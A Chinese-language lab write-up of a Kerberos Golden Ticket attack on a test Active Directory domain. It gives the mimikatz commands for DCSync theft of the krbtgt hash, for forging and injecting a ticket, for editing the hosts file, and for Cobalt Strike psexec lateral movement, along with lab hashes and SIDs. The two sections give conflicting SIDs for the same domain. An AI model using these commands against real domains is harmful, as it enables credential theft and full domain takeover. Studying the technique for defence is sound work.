28黄金票据-实验

## 域内机器上线域控

1、已控制域内192.168.110.7机器

2、查询当前用户名及所在组

![](https://oss.maolin101.com/202501061839836.png-101.webp)

3、查询当前的SID

```
S-1-5-21-2744095687-1279945619-2928600117
```

![](https://oss.maolin101.com/202501061839837.png-101.webp)

4、获取krbtgt用户的hash值

```
mimikatz lsadump::dcsync /domain:xbxaq.com /user:krbtgt
```

![](https://oss.maolin101.com/202501061839838.png-101.webp)

```
6d342f0e6752f07076928c15ea90d5f1
```

5、通过mimikatz制作黄金票据，并且直接注入到内存中

```
mimikatz kerberos::golden /user:administrator /domain:xbxaq.com /sid:S-1-5-21-2744095687-1279945619-2928600117 /krbtgt:6d342f0e6752f07076928c15ea90d5f1 /ptt
```

![](https://oss.maolin101.com/202501061839839.png-101.webp)

![](https://oss.maolin101.com/202501061839840.png-101.webp)

6、横向上线

使用cs中自带的psexec工具

```
jump psexec 192.168.110.5 test     #test为监听器
```

![](https://oss.maolin101.com/202501061839841.png-101.webp)

## 工作组机器上线域控

已经控制一台工作组机器，得知内网的域名为xbxaq.com

![](https://oss.maolin101.com/202501061839842.png-101.webp)

猜测192.168.110.5为域控机器

1、首先将DNS指向域控（改网卡或者hosts文件）

```
echo 192.168.110.5 xbxaq.com >> C:\Windows\System32\drivers\etc\hosts
或者
netsh interface ipv4 add dns 网口名字 DNS
```

![](https://oss.maolin101.com/202501061839843.png-101.webp)

2、获取krbtgt的hash值

```
mimikatz lsadump::dcsync /domain:xbxaq.com /user:krbtgt
```

![](https://oss.maolin101.com/202501061839844.png-101.webp)

```
6d342f0e6752f07076928c15ea90d5f1
```

3、获取SID

![](https://oss.maolin101.com/202501061839845.png-101.webp)

```
S-1-5-21-2466639231-2518717437-756379722
```

4、生成黄金票据且直接注入内存中

```
mimikatz kerberos::golden /user:administrator /domain:xbxaq.com /sid:S-1-5-21-2466639231-2518717437-756379722 /krbtgt:6d342f0e6752f07076928c15ea90d5f1 /ptt
```

![](https://oss.maolin101.com/202501061839846.png-101.webp)

![](https://oss.maolin101.com/202501061839847.png-101.webp)

5、psexec上线

![](https://oss.maolin101.com/202501061839848.png-101.webp)